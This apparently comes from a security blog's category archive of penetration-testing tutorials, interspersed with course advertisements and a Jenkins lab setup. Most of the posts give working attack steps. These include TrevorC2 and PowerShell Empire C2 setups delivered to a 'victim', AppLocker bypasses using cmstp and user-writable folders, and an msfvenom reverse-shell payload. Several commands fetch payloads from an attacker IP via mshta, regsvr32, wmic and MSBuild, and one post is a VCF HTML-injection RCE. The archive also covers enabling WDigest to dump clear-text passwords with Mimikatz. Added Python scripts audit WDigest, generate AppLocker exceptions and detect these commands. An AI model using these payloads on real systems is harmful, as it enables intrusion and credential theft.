Category Archives: penetration testing

TrevorC2 – Command and Control

TrevorC2 is a command and control framework. It uses a client/server model in which the C2 traffic is disguised as ordinary browsing of a cloned website. Check-ins happen at varying time intervals, which makes it almost impossible to detect. The tool is written in Python, but clients are also available for C#, PowerShell and other platforms. It is supported on Windows and macOS as well as Linux, and it is very easy and convenient to use.

You can download it from

https://github.com/trustedsec/trevorc2

Once it is downloaded, open the folder, then open the trevorc2_server.py file and change the IP to your local IP, as shown in the image below. Also provide the site that the trevorc2 server will clone.

Then start the trevorc2 server.

Once trevorc2 is up and running, change the IP in the trevorc2.ps1 file to your local IP as well.

Then send this file to the victim using any desired social engineering method. Once the victim executes the file, you will have your session, as shown in the image below:

To list the sessions, type:

list

And to access a session, type:

interact <session number>

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post TrevorC2 – Command and Control appeared first on Hacking Articles.

Bypass Application Whitelisting using cmstp

By default, AppLocker allows binaries located in its default (Windows) folders to execute, and that is the main reason it can be bypassed: such binaries can easily be used to bypass AppLocker along with UAC. One such Microsoft binary is CMSTP. CMSTP accepts INF files, so exploitation through an INF file is possible, and that is what we will be learning here.

As we all know, CMSTP accepts SCT files and runs them without raising suspicion, so we will create a malicious SCT file to reach our goal. We will use Empire PowerShell for this. For a detailed guide on Empire PowerShell, click here.

Launch the Empire framework from the Kali terminal and type the following commands to create your malware:

listeners
uselistener http
set Host 192.168.1.109
execute

The above commands will create a listener for you. Then type back to return from the listener interface, and to create the SCT file type:

usestager windows/launcher_sct
set Listener HTTP
execute

Running the above will create your SCT file. We will use the following INF script to execute our file through PowerShell. In this script, give the path of your SCT file and add the line shown in the image.

Download this script from here:


Now send the file to the victim's PC and run the following command in the victim's command prompt:

cmstp.exe /s shell.inf

As soon as you run the command, you will have a session. Use the following command to access it:

interact <session name>

This way, you can use the CMSTP binary to bypass AppLocker restrictions. CMSTP needs an INF file, and by using that to your advantage you can gain access to the victim's PC.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post Bypass Application Whitelisting using cmstp appeared first on Hacking Articles.

Red Team/Blue Team Practice on Wdigest

In this article, we will show you how to protect your system against Mimikatz, which fetches passwords in clear text from WDigest. As you know, pentesters and red teams use Mimikatz for password testing. For complete information on how Mimikatz works, visit this link:

https://www.hackingarticles.in/understanding-guide-mimikatz/

Table of Contents

  • Introduction
    • System impacted
  • Demonstration on Windows 7
    • Disable WDigest (defending against mimikatz)
  • Demonstration on Windows 10
    • Enable WDigest in Windows 10
    • Enable WDigest via the registry key

Introduction of WDigest

WDigest.dll was introduced in the Windows XP operating system, where Microsoft added support for a protocol known as WDigest. The WDigest protocol is used by clients to send clear-text credentials to Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) applications, based on RFC 2617 and RFC 2831. When the WDigest authentication protocol is enabled, the clear-text password is stored in memory, where it is at risk of theft.

System Impacted

The problem with WDigest is that it stores passwords in memory in clear text, from where they can be extracted using Mimikatz. The following operating systems are impacted: Windows 7, Windows 8, Windows 8.1, Windows Server 2008, Windows Server 2008 R2 and Windows Server 2012.

Demonstration on Windows 7

An attacker with administrator privileges can steal credentials from a compromised system's memory. Credentials in memory are stored in plain text and in various hash formats. First, we will demonstrate how the Windows 7 password can be seen using the Mimikatz tool, as shown in the image below, where it is displayed in clear text. For this we run the following commands in Mimikatz:

privilege::debug
sekurlsa::wdigest

As you can observe, it has shown the password in clear text. We can also do this by taking a meterpreter session on the target system and then using Mimikatz from Kali. Here you will see that it has also shown us the password of the compromised system.

Disable WDigest (Defending against Mimikatz)

Now that we know this is a security threat, we will see how to remove it from our system. A registry change is required to hide the password. First open regedit and then go to the WDigest key using the following path:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest

Here you need to open the Security Packages value, and you will see WDigest among the other entries, as shown in the image below.

Great! You have found it. Now simply remove WDigest from here so that nobody can see the password using the Mimikatz tool.

After making these changes, we need to update the group policy and reboot the system. After that we will use Mimikatz again to see the change. Running the same commands as before, this time it shows the password as NULL, as shown in the image.

Great! We have successfully hidden the password. Now, even if somebody has taken a meterpreter session on the Windows 7 machine and tries this from Kali using Mimikatz, the attacker is not able to get the password of the compromised system, as shown in the image below.

Demonstration on Windows 10

In the same way, we will try this method on Windows 10, where, as we know, WDigest is disabled by default. We can verify this using Mimikatz there.


Enable WDigest in Windows 10

Yes, as we have verified, the WDigest option is disabled by default. Now we will learn how to enable WDigest on Windows 10. For this we first need a meterpreter session on the target system with admin access, and then we use the following module to enable WDigest on the target:

On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider’s Registry key. Any subsequent logins will allow mimikatz to recover the plain text passwords from the system’s memory.

use post/windows/manage/wdigest_caching
msf post(windows/manage/wdigest_caching) > set session 2
msf post(windows/manage/wdigest_caching) > exploit

After making the changes we will check whether the WDigest option is enabled. For this we use Mimikatz again, and we observe that we have obtained the password of the victim's PC.

We can also do this from a meterpreter session on the system, using Mimikatz there.

Enable Wdigest via a registry key

There is one more way to see the password. The second method to enable WDigest is to take a shell on the compromised system and run the following command:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

Once you have the shell, run Mimikatz with the same commands as before to see the password, and you will observe that we have got it.

Excellent, we have done this with the second method as well. Now we know how to see the password on Windows 10 and how to enable and disable WDigest.
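As an added defensive example (not code from the original article), the Python script below audits the UseLogonCredential value the two enable/disable methods above toggle. It parses the output of `reg query` on the WDigest key, decides whether clear-text caching is in effect (an absent value is treated as enabled on the OS versions the post lists as impacted), and produces the reg command that turns it off. The registry dumps are constructed samples; the decision logic assumes the post's list of impacted versions.

```python
import re
from dataclasses import dataclass
from typing import Optional

WDIGEST_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"

# OS versions this post lists as caching clear-text credentials by default.
# A missing UseLogonCredential value on one of these is treated as "enabled".
LEGACY_DEFAULT_ON = {
    "windows 7", "windows 8", "windows 8.1",
    "windows server 2008", "windows server 2008 r2", "windows server 2012",
}

# Matches the value line as printed by `reg query <WDIGEST_KEY>`, e.g.
#     UseLogonCredential    REG_DWORD    0x1
VALUE_RE = re.compile(
    r"^\s*UseLogonCredential\s+REG_DWORD\s+(0x[0-9a-fA-F]+|\d+)\s*$",
    re.IGNORECASE | re.MULTILINE,
)


@dataclass
class WDigestStatus:
    os_name: str
    value: Optional[int]       # UseLogonCredential as found; None if the value is absent
    caching_enabled: bool
    reason: str

    def remediation(self) -> Optional[str]:
        """The reg command that turns caching off, or None if nothing needs doing.
        The change applies to subsequent logons; credentials already held by LSASS
        stay there until the session ends or the host reboots."""
        if not self.caching_enabled:
            return None
        return (f"reg add {WDIGEST_KEY} /v UseLogonCredential "
                "/t REG_DWORD /d 0 /f")


def parse_use_logon_credential(reg_query_output: str) -> Optional[int]:
    m = VALUE_RE.search(reg_query_output)
    return int(m.group(1), 0) if m else None


def assess(os_name: str, reg_query_output: str) -> WDigestStatus:
    value = parse_use_logon_credential(reg_query_output)
    if value is not None:
        enabled = value != 0
        reason = f"UseLogonCredential is explicitly set to {value}"
    elif os_name.strip().lower() in LEGACY_DEFAULT_ON:
        enabled = True
        reason = "value absent and this OS caches clear-text credentials by default"
    else:
        enabled = False
        reason = "value absent and this OS disables WDigest caching by default"
    return WDigestStatus(os_name, value, enabled, reason)


# Constructed `reg query` dumps: one where the value has been set to 1 (the state the
# reg add / wdigest_caching steps above leave behind) and one where it was never created.
SAMPLE_ENABLED = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
    Debuglevel    REG_DWORD    0x0
    Negotiate    REG_DWORD    0x0
    UTF8HTTP    REG_DWORD    0x1
    UTF8SASL    REG_DWORD    0x1
    UseLogonCredential    REG_DWORD    0x1
"""
SAMPLE_ABSENT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
    Debuglevel    REG_DWORD    0x0
    Negotiate    REG_DWORD    0x0
    UTF8HTTP    REG_DWORD    0x1
    UTF8SASL    REG_DWORD    0x1
"""

if __name__ == "__main__":
    cases = (("Windows 10", SAMPLE_ENABLED), ("Windows 10", SAMPLE_ABSENT), ("Windows 7", SAMPLE_ABSENT))
    for os_name, dump in cases:
        st = assess(os_name, dump)
        print(f"{os_name}: caching_enabled={st.caching_enabled} ({st.reason})")
        if st.remediation():
            print("  fix:", st.remediation())
```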

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security.

The post Red Team/Blue Team Practice on Wdigest appeared first on Hacking Articles.

Introduction to Pentesting: From n00b to Professional

So, you want to become a pentester? Penetration testing is not only a financially rewarding career; professionals in this field also find it personally fulfilling. It does, however, require some serious skills to get there! Here is an introduction to penetration testing and how to take your first step in this field.

Why Penetration Testing Is Important

Penetration testing (pentesting) consists of testing a computer system, network, web application, etc. to find security vulnerabilities before malicious actors do. In other words, penetration testers perform 'deep investigations' of a remote system's security flaws.

This activity requires methodology and skills. Penetration testers, unlike malicious hackers, must test for any and all vulnerabilities, not just the ones that might grant them root access to a system.

Penetration testing is NOT about getting root!!!

The ultimate goal of penetration testers is not to get access as fast as possible, but to thoroughly identify the security posture of an organization, and recommend the right solution/s to fix the vulnerabilities found.

The most important part of the penetration testing methodology, the reporting phase, is often the most overlooked. That's a BIG mistake! Clients will usually judge a pentester's work on the quality of the report. This is why writing skills really come in handy; more on the skills needed to succeed in this field later in this article.

Penetration testers, moreover, must not damage their clients' infrastructure. Pentesting requires a thorough understanding of attack vectors and their potential impact.

In a world ever-more connected, everything can be tested. Here are some of the most common types of pentests:

  • Network Pentesting,
  • Wireless Network Pentesting,
  • Web Application Pentesting,
  • Mobile Application Pentesting,
  • Wifi Pentesting,
  • System Pentesting,
  • Servers Pentesting,
  • IoT Pentesting,
  • Cloud-based Application Pentesting,

But also…

  • Humans/employees can be an organization's weakest link. To ensure that all employees are aware of the risks, and to keep a company secure, penetration testers might be asked to perform social engineering tests.

Learn the basics of social engineering and how to use popular credential grabbing tools like Modlishka and SET in this webinar by The Ethical Hacker Network and Erich Kron of KnowBe4.

Needless to say, pentesting is a highly practical job! To become a penetration tester, you'll need to learn the theory, the methodologies and, most importantly, the hands-on techniques to carry out your tasks.

Below are some of the most important skills to get you started.

The Skills Penetration Testers Need To Succeed

To become a junior penetration tester, you’ll need to have a strong understanding of the networking basics:

  • Routing, Forwarding, TCP/IP
  • Traffic analysis with Wireshark

But also know the pentesting methodology:

  • Information gathering
  • Footprinting and scanning
  • Vulnerability assessments
  • Exploitation 
  • Reporting

And most importantly, know the most common hacking techniques and tools by heart:

  • How web attacks work
  • Basic usage of Nmap, Nessus, BurpSuite, and Metasploit
  • Understanding Buffer Overflows
  • How XSS and SQL Injection work
  • How to hack the human brain (social engineering)

Want to learn the skills and techniques mentioned above? Skip to the next part to see how you can get started.

How To Get Started?

So, you want to become a penetration tester? You might just be in luck!

On the occasion of our Beginners' Month, we are offering the Penetration Testing Student (PTS) training course in Elite Edition for free with every enrollment in the Penetration Testing Professional (PTP) training course.

Combined together, these two of our best-selling training courses will take you from script kiddie to a more advanced and professional penetration tester level.

We pride ourselves in offering highly practical and self-paced training courses, so you’ll be able to learn new penetration testing skills and techniques from the comfort of your home, at your own pace.

By enrolling in these two courses, you’ll get lifetime access to

  • Thousands of slide course materials,
  • Hundreds of video course materials,
  • Hours of virtual labs based on real-life scenarios,
  • A shiny certificate to prove your practical skills!

Yes, that’s right! You’ll get the chance to prove your skills and become certified eLearnSecurity Junior Penetration Tester (eJPT) after completing the PTS training course and eLearnSecurity Certified Professional Penetration Tester (eCPPT) after the PTP training course.

Aspiring to become a professional Penetration Tester? Enroll in PTPv5 in Elite Edition before February 28 to receive PTS in Elite Edition at no additional cost!


What do successful pentesting attacks have in common?

In external penetration testing undertaken for corporate clients in the industrial, financial and transport verticals in 2018, Positive Technologies found that, at the vast majority of companies, there were multiple vectors by which an attacker could reach the internal network. In internal pentesting, full control of the infrastructure was obtained on all tested systems. In addition, the testers obtained access to critical resources such as ICS equipment, SWIFT transfers and ATM management. These statistics are based on …

The post What do successful pentesting attacks have in common? appeared first on Help Net Security.

Bypass Application Whitelisting using Weak Path Rule

Finding loopholes is very important when you are part of a pen-testing team, because such loopholes are what attackers actively look for and exploit. So, in order to patch such loopholes, you must know how and where to find them. One such loophole is what is known as weak (user-writable) folders in Windows.

To secure Windows, Microsoft provides multiple security policies. One such policy does not allow an exe file to execute, which means that a malicious exe file sent by an attacker will not work on the targeted PC. To apply such a policy, go to Local Security Policy > AppLocker > Executable Rules and then apply the policy. As you can see in the image below, the default rule has been set.

Now, if you try to run any given .exe file, it will not run. Here I have tried to execute putty.exe, but as you can see in the image below, it does not run.

The loophole in this policy is that there are still a few folders which, despite the activated security policy, have read and write permission for users, and files placed in these folders will execute. If I run the same exe, i.e. putty.exe, from C:\Windows\Tasks, it executes, as shown in the image below.

To check which folders have read and write permission, you can use the following command:

accesschk64.exe "Users" c:/Windows -w

Using this command, you can see in the following image that access is denied everywhere except for the Temp, Tasks and tracing folders.

Now let's experiment with malware that we create for the targeted PC using msfvenom with the following command:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 -f exe > shell.exe

When you execute the above malware on the victim's PC, it will not run because of the applied security policy.

But if, using the loophole, you execute the file from the Tasks folder as shown in the image below, you will have your meterpreter session as desired.

So, whether you are providing security or attacking, you must know everything about the targeted machine, so that you can either use its security against it or provide even better security by patching such loopholes.
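As an added defensive counterpart to the accesschk walkthrough above (not code from the original post), this Python script parses accesschk -w style output, lists the user-writable folders under C:\Windows, and emits an AppLocker executable rule that keeps the default Windows-folder allow rule but lists those folders as exceptions. The accesschk output is a constructed sample, and the AppLocker XML layout is assumed from the policy export format; compare the generated XML against a policy exported from your own environment before importing it.

```python
import re
import uuid
import xml.etree.ElementTree as ET
from typing import List, Tuple

WINDIR = r"C:\Windows"

# Constructed sample of `accesschk64.exe -w Users C:\Windows` style output: a leading
# "RW"/"W" means the Users group can write to the folder, "R" means read-only.
SAMPLE_ACCESSCHK = r"""
R  C:\Windows\addins
R  C:\Windows\appcompat
RW C:\Windows\Tasks
RW C:\Windows\Temp
RW C:\Windows\tracing
R  C:\Windows\System32
"""

LINE_RE = re.compile(r"^(RW|R|W)\s+(\S.*)$")


def writable_dirs(accesschk_output: str) -> List[str]:
    """Return every path that accesschk reported as writable, in the order printed."""
    found: List[str] = []
    for line in accesschk_output.splitlines():
        m = LINE_RE.match(line.strip())
        if m and "W" in m.group(1):
            found.append(m.group(2).strip())
    return found


def to_applocker_path(path: str, windir: str = WINDIR) -> str:
    r"""C:\Windows\Tasks -> %WINDIR%\Tasks\*  (AppLocker path rules use the %WINDIR% variable)."""
    if path.lower().startswith(windir.lower()):
        path = "%WINDIR%" + path[len(windir):]
    return path.rstrip("\\") + "\\*"


def build_exe_rule_with_exceptions(exception_paths: List[str]) -> str:
    """Emit the default 'All files located in the Windows folder' allow rule with the
    writable folders listed as exceptions, in AppLocker policy XML form (assumed layout)."""
    policy = ET.Element("AppLockerPolicy", Version="1")
    coll = ET.SubElement(policy, "RuleCollection", Type="Exe", EnforcementMode="Enabled")
    rule = ET.SubElement(
        coll, "FilePathRule",
        Id=str(uuid.uuid4()),
        Name="(Default Rule) All files located in the Windows folder",
        Description="Windows folder allow rule with user-writable sub-folders excepted",
        UserOrGroupSid="S-1-1-0",   # Everyone
        Action="Allow",
    )
    conditions = ET.SubElement(rule, "Conditions")
    ET.SubElement(conditions, "FilePathCondition", Path="%WINDIR%\\*")
    if exception_paths:
        exceptions = ET.SubElement(rule, "Exceptions")
        for p in exception_paths:
            ET.SubElement(exceptions, "FilePathCondition", Path=p)
    return ET.tostring(policy, encoding="unicode")


def audit(accesschk_output: str) -> Tuple[List[str], str]:
    """Writable folders found, plus the rule XML that excepts them."""
    dirs = writable_dirs(accesschk_output)
    return dirs, build_exe_rule_with_exceptions([to_applocker_path(d) for d in dirs])


if __name__ == "__main__":
    dirs, xml = audit(SAMPLE_ACCESSCHK)
    print("writable under %WINDIR%:", *dirs, sep="\n  ")
    print(xml)
```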

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post Bypass Application Whitelisting using Weak Path Rule appeared first on Hacking Articles.

Multiple Ways to Exploiting Windows PC using PowerShell Empire

This is our second post in the 'PowerShell Empire' article series. In this article we will cover all the exploits that lead to Windows exploitation with Empire. For our first post in the Empire series, which gives a basic guide to navigating your way through Empire, click here.

Table of Contents:

  • Exploiting through HTA
  • Exploiting through MSBuild.exe
  • Exploiting through regsvr32
  • XSL exploit
  • Exploiting through visual basic script
  • BAT exploit
  • Multi_launcher exploit

Exploiting through HTA

This attack helps us exploit Windows through a .hta file. When a .hta file is run via mshta.exe, it executes like an .exe file with similar functionality, which lets us hack our way through. To know more about this attack, please click here.

To start Empire, type './Empire'.

According to the workflow, first we have to create a listener on our local machine. Type the following command:

listeners

After running the above command, it will say that "no listeners are currently active", but don't worry, we are now in the listener interface. In this listener interface, type:

uselistener http
set Host http://192.168.1.107
execute

Now that a listener is created, type 'back' to leave the listener interface and create the exploit. For this, type:

usestager windows/hta
set Listener http
set OutFile /root/1.hta
execute

Running the above commands will create a .hta file to be used as the malware. Start a Python web server with the following command in order to share the .hta file:

python -m SimpleHTTPServer 8080

With the Python server up and running, type the following command in the victim's command prompt to execute our malicious file:

mshta.exe http://192.168.1.107:8080/1.hta

The moment the above command is executed, you will have your session. To access it, type:

interact XDGM6HLE
sysinfo

Exploiting through MSBuild.exe

Our next exploit is via MSBuild.exe, which will give you a remote session on Windows using an XML file. To know about this attack in detail, please click here. To use this exploit, type:

listeners
uselistener http
set Host http://192.168.1.107
execute

This creates a listener. Type 'back' to leave the listener interface and create the exploit. For this, type:

usestager windows/launcher_xml
set Listener http
execute

Now an .xml file has been created in /tmp. Copy this file to the victim's PC (inside C:\Windows\Microsoft.NET\Framework\v4.0.30319\) and run it with the following combination of commands:

cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
MSBuild.exe launcher.xml

This way you will have your session. To access it, type:

interact A8H14C7L
sysinfo

Exploiting through regsvr32

Our next method is exploiting through regsvr32. To know about this attack in detail, click here. As always, we first have to create a listener on our local machine. Type the following command:

listeners
uselistener http
set Host http://192.168.1.107
execute

Now that a listener is created, type 'back' to leave the listener interface and create the exploit. For this, type:

usestager windows/launcher_sct
set Listener http
execute


This will create a .sct file in /tmp. Share this file with the victim's PC using the Python server, and then run it from the Run window of the victim's PC by typing the following command:

regsvr32 /u /n /s /i:http://192.168.1.107:8080/launcher.sct scrobj.dll

Thus you will have an active session. To access it, type:

interact <session name>
sysinfo

Exploiting through XSL

XSL is a stylesheet language that helps you format XML data; it describes how XML content is transformed and presented. Our next method of attack with Empire is by exploiting a .xsl file. For this method, let's activate our listener first by typing:

listeners
uselistener http
set Host http://192.168.1.107
execute

Now that the listener is up and running, create your exploit:

usestager windows/launcher_xsl
set Listener http
execute

This way a .xsl file is created. Now run the Python server from the folder where the .xsl file was created, as shown in the image below:

cd /tmp
python -m SimpleHTTPServer 8080

Now execute the following command in the victim's command prompt:

wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl"

Running the above will give you a session. To access it, type:

interact <session name>
sysinfo

Exploiting through Visual Basic script

Our next method is to create a malicious VBS file and exploit our victim through it. As always, let's create a listener first.

listeners
uselistener http
set Host http://192.168.1.107
execute

Now, to create our malicious .vbs file, type:

usestager windows/launcher_vbs
set Listener http
execute

Next step is to start the python server by typing:

python -m SimpleHTTPServer 8080

Once the .vbs file has been shared through the Python server and executed on the victim's PC, you will have your session. Just like before, to access it type:

interact <session name>
sysinfo

Exploiting through .bat

In this method, we will exploit through a .bat file. Like our previous exploits, let's create a listener first. For this, type:

listeners
uselistener http
set Host http://192.168.1.107
execute
back

The above commands will create a listener for you. Let's create our .bat file using the following commands:

usestager windows/launcher_bat
set Listener http
set OutFile /root/1.bat
execute

As shown, the above commands will create a .bat file. Start the Python server with the following command so that you can share the .bat file with the victim's PC.

python -m SimpleHTTPServer 8080

Once the .bat file is run, a session will be activated. To access it, type:

interact <session name>
sysinfo

Multi_launcher

This is the last method of this post. It can be used on various platforms such as Windows, Linux, etc. Again, even for this method, create a listener:

listeners
uselistener http
set Host http://192.168.1.107
execute

Then type the following commands to create your malicious file:

usestager multi/launcher
set Listener http
execute

Once you hit enter after the above commands, Empire will give you a launcher code. Copy this code, paste it into the victim's command prompt and hit enter. As soon as you do, a session will be activated. To access it, type:

interact <session name>
sysinfo

Conclusion

The above were the methods you can use to exploit Windows through these different vulnerabilities. Using this framework is an addition to your pentesting skills after Metasploit. Enjoy!
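As an added detection-side example covering both this Empire post and the CMSTP post above (not code from the original articles), the Python below runs a small rule set over process-creation events: the silent cmstp INF install, mshta/regsvr32/wmic fetching a remote .hta/.sct/.xsl, MSBuild given a bare .xml project, and the hidden encoded PowerShell shape of the multi/launcher one-liner. The events are constructed JSON lines with Sysmon-style field names (Computer, Image, CommandLine), which is an assumption about the log source; the last three lines are benign look-alikes that must not fire.

```python
import json
import re
from typing import Callable, Dict, Iterable, List, Tuple

# Matches http:// and https:// (and the single-slash "http:/" typo variant).
REMOTE_URL = re.compile(r"https?:/+", re.IGNORECASE)


def _tokens(cmd: str) -> List[str]:
    return cmd.split()


# Each rule: (rule name, image basename, predicate over the lower-cased command line).
# Only the argument shapes walked through on this page are encoded here.
RULES: List[Tuple[str, str, Callable[[str], bool]]] = [
    # cmstp.exe /s shell.inf  (silent INF install used for the AppLocker bypass)
    ("cmstp_silent_inf", "cmstp.exe",
     lambda c: "/s" in _tokens(c) and ".inf" in c),
    # mshta.exe http://.../1.hta  (remote HTA, or inline script protocols)
    ("mshta_remote_hta", "mshta.exe",
     lambda c: bool(REMOTE_URL.search(c)) or "vbscript:" in c or "javascript:" in c),
    # regsvr32 /u /n /s /i:http://.../launcher.sct scrobj.dll  (scriptlet via scrobj)
    ("regsvr32_scrobj_scriptlet", "regsvr32.exe",
     lambda c: "scrobj.dll" in c and "/i:" in c),
    # MSBuild.exe launcher.xml  (inline task in a plain .xml project file)
    ("msbuild_xml_project", "msbuild.exe",
     lambda c: any(t.endswith(".xml") for t in _tokens(c))),
    # wmic process get brief /format:"http://.../launcher.xsl"  (remote XSL)
    ("wmic_remote_xsl", "wmic.exe",
     lambda c: "/format:" in c and bool(REMOTE_URL.search(c))),
    # powershell -noP -sta -w 1 -enc <base64>  (shape of the multi/launcher one-liner)
    ("powershell_hidden_encoded", "powershell.exe",
     lambda c: ("-enc" in c or "-encodedcommand" in c)
     and ("-w 1" in c or "-nop" in c or "-windowstyle hidden" in c)),
]


def image_basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: Iterable[str]) -> List[Dict[str, str]]:
    """Run every rule over JSON-lines process-creation events; return the hits in order."""
    hits: List[Dict[str, str]] = []
    for raw in events:
        raw = raw.strip()
        if not raw:
            continue
        ev = json.loads(raw)
        image = image_basename(ev.get("Image", ""))
        cmd = ev.get("CommandLine", "")
        for name, exe, pred in RULES:
            if image == exe and pred(cmd.lower()):
                hits.append({"rule": name, "host": ev.get("Computer", "?"), "cmd": cmd})
    return hits


# Constructed sample events (Sysmon Event ID 1 style fields, one JSON object per line):
# the first six mirror the commands from this page, the last three are benign look-alikes.
SAMPLE_EVENTS = r'''
{"Computer": "WS01", "Image": "C:\\Windows\\System32\\cmstp.exe", "CommandLine": "cmstp.exe /s shell.inf"}
{"Computer": "WS01", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta.exe http://192.168.1.107:8080/1.hta"}
{"Computer": "WS02", "Image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe", "CommandLine": "MSBuild.exe launcher.xml"}
{"Computer": "WS02", "Image": "C:\\Windows\\System32\\regsvr32.exe", "CommandLine": "regsvr32 /u /n /s /i:http://192.168.1.107:8080/launcher.sct scrobj.dll"}
{"Computer": "WS03", "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", "CommandLine": "wmic process get brief /format:\"http://192.168.1.107:8080/launcher.xsl\""}
{"Computer": "WS03", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -noP -sta -w 1 -enc <base64-placeholder>"}
{"Computer": "WS01", "Image": "C:\\Windows\\System32\\regsvr32.exe", "CommandLine": "regsvr32.exe /s \"C:\\Program Files\\Vendor\\vendor.dll\""}
{"Computer": "WS02", "Image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe", "CommandLine": "MSBuild.exe App.csproj /t:Build"}
{"Computer": "WS03", "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", "CommandLine": "wmic os get caption"}
'''


def run_sample() -> List[Dict[str, str]]:
    return detect(SAMPLE_EVENTS.splitlines())


if __name__ == "__main__":
    for hit in run_sample():
        print(f"[{hit['rule']}] {hit['host']}: {hit['cmd']}")
```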

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post Multiple Ways to Exploiting Windows PC using PowerShell Empire appeared first on Hacking Articles.

Jenkins Pentest Lab Setup

You all know that we have performed many CTF challenges and got to know about Jenkins there, so let's get to know Jenkins better. For this we have a new article covering the Jenkins-related challenges you will face while doing CTFs, to make them easier. So let's do it.

Table of Contents

Introduction of Jenkins

Lab setup

  • Install java
  • Import the GPG keys
  • Add the Jenkins repository
  • Install Jenkins
  • Setup Jenkins

Jenkins penetration testing

Exploiting Groovy Script

Introduction of Jenkins

Jenkins is an open-source automation server written in Java that offers a simple way to set up a continuous CI/CD pipeline. It supports version control tools including AccuRev, CVS, Subversion, Git, Mercurial, Perforce, TD/OMS, ClearCase and RTC, and can execute Apache Ant, Apache Maven and sbt based projects as well as arbitrary shell scripts and Windows batch commands. The creator of Jenkins is Kohsuke Kawaguchi. Jenkins achieves continuous integration with the help of plugins, which allow the integration of the various DevOps stages. If you want to integrate a particular tool, you need to install the plugins for that tool, for example Git, Maven 2 project, Amazon EC2, HTML publisher, etc.

Lab setup

Install Java

Now we need to install Jenkins, and for this it is mandatory that you are logged in as a sudo user or root. Because Jenkins is a Java application, installing Java is the first step. Update the package index and install the OpenJDK 8 package using the following commands:

sudo apt update
sudo apt install openjdk-8-jdk

Import the GPG keys

wget -q -O - https://pkg.jenkins.io/debian/jenkins.io.key | sudo apt-key add -

Add the Jenkins repository

When the key is added, the system returns OK. Next, add the Debian package repository to the server's sources list:

sudo sh -c 'echo deb http://pkg.jenkins.io/debian-stable binary/ > /etc/apt/sources.list.d/jenkins.list'
sudo apt update

Install Jenkins

The Jenkins version in the default Ubuntu packages is often behind the project's latest version; using the project-maintained packages lets you take advantage of the latest fixes and features. Now open the Kali terminal and install Jenkins with the commands below, allowing port 8080 through the firewall:

sudo apt install jenkins
sudo ufw allow 8080

You can use the status command to check that Jenkins has started successfully:

systemctl status jenkins

Visit Jenkins on its default port 8080 to set up your installation, using your server's domain name or IP address: http://your-server-ip-or-domain:8080

You should see the Unlock Jenkins screen displaying the location of the initial password.

In the terminal window, use the cat command to display the password:

sudo cat /var/lib/jenkins/secrets/initialAdminPassword

Copy the password from your terminal, paste it into the Administrator password field and click Continue.

On the next page, you will be asked whether you want to install the suggested plugins or select specific plugins. Click the "Install suggested plugins" box to start the plugin installation immediately.

In my case it took a lot of time to get all the plugins installed successfully.

Once the installation is complete, you will get another page to create the first admin user account. Fill in all the essential details and click "Save and Continue".

Click "Save and Finish" after confirming the corresponding information. You will then see a confirmation page saying "Jenkins is ready". To visit the Jenkins main dashboard, click "Start using Jenkins".

That’s wonderful! You have successfully installed Jenkins on your system.

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security.

The post Jenkins Pentest Lab Setup appeared first on Hacking Articles.

#MyInfoSecStory Contest: Win The Course Of Your Choice

Has eLearnSecurity or one of our training courses helped you or your career? We'd love to hear that story! Get a chance to win your favorite course this month with our #MyInfoSecStory LinkedIn contest. Discover how to enter and the guidelines for your chance to win below.


Get your keyboards in order — Ready, set, go!


Exploiting Windows using Contact File HTML Injection/RCE

After the 0-day exploit on malicious VCF files in Windows, cyber security researcher John Page deserves another round of applause for bringing this vulnerability to exploit-db's attention on 23rd January 2019. This vulnerability further exploits the RCE vulnerability present in VCF files with HTML injection. To read the previous article, follow the link here.

Introduction: The idea here is to include a malicious VBScript file in the email section of the VCF file, so that a script is executed locally instead of the email being opened via mailto. We'll be using the HTML anchor tag (<a>) to achieve this. John classifies this vulnerability as "Mailto: HTML Link Injection Remote Code Execution". To read more about the discovery and its origin, follow the link here.

Methodology:

  • Making an msfvenom payload of a .vbs format.
  • Sending the VBS file to victim.
  • Creating a VCF file in the parent folder.
  • Adding an email into the contact with HTML injection parameters.
  • Running multi/handler in a separate window.
  • Opening email in the VCF file.
  • Spawning meterpreter.

So, without any further ado, let’s dive right into it.

Proof of Concept:

The first step is to make a payload with a .vbs extension. For this we are using msfvenom's Windows payload, but any other payload should work just fine.

In my case, the local IP address is 192.168.1.109.

Once the payload is made, transfer the .vbs file to the victim's PC.

The next and most important step is to make a contact VCF file. You can also download a sample VCF and add a website, but we made a new contact file. The system we are using is Windows 10, so the version of the VCF file may differ from yours, but it works just the same. Once the contact file is made, under the e-mail tab, add the HTML injection like this:

<a href="raj\shell.vbs">raj@gmail.com</a>

